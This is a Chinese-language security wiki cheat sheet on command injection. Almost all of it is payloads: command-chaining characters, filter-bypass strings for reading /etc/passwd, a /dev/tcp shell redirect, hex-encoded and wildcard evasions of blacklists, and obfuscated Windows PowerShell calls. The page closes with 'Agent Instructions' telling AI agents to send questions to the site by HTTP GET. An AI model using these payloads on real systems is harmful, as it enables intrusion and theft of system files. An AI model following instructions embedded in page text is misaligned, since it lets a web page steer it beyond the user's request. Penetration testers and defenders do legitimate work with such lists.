# 命令注入

```
有时应用程序会接受用户提供的输入并作为参数传递给命令行上的工具。 将用户提供的输入传递给命令行总是一个坏主意，应该避免。 根据操作系统，您可以使用多种技术来执行其他命令，从而允许攻击者获得 RCE
& 
&&
|
||
;
`Command`
$(Command)
```

**工具**

```
https://github.com/commixproject/commix
```

**绕过 bypass**

**Linux无空格**

```
cat</etc/passwd
{cat,/etc/passwd}
cat$IFS/etc/passwd
echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
X=$'uname\x20-a'&&$X
sh</dev/tcp/127.0.0.1/4242
IFS=,;`cat<<<uname,-a`
;ls%09-al%09/home
```

**Windows**

```
ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP
```

**绕过回车**

```
something%0Acat%20/etc/passwd
写文件
;cat>/tmp/hi<<EOF%0ahello%0aEOF
;cat</tmp/hi
hello
```

**通过十六进制编码绕过**

```
Linux
cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
cat `xxd -r -p <<< 2f6574632f706173737764`
cat `xxd -r -ps <(echo 2f6574632f706173737764)`
```

**绕过字符过滤器**

```
没有反斜杠和斜杠的命令执行
cat ${HOME:0:1}etc${HOME:0:1}passwd
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
```

**绕过列入黑名单的词**

```
单引号w'h'o'am'i
双引号w"h"o"am"i
用反斜杠和斜杠绕过
w\ho\am\i
/\b\i\n/////s\h
使用 $@ 绕过
who$@ami

echo $0
-> /usr/bin/zsh
echo whoami|$0
使用 $() 绕过
who$()ami
who$(echo am)i
who`echo am`i
使用变量扩展绕过
/???/??t /???/p??s??

test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
使用通配符绕过
powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.heresecurity.wiki/chu-shi-fang-wen/web-fu-wu-tu-po/ming-ling-zhu-ru.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.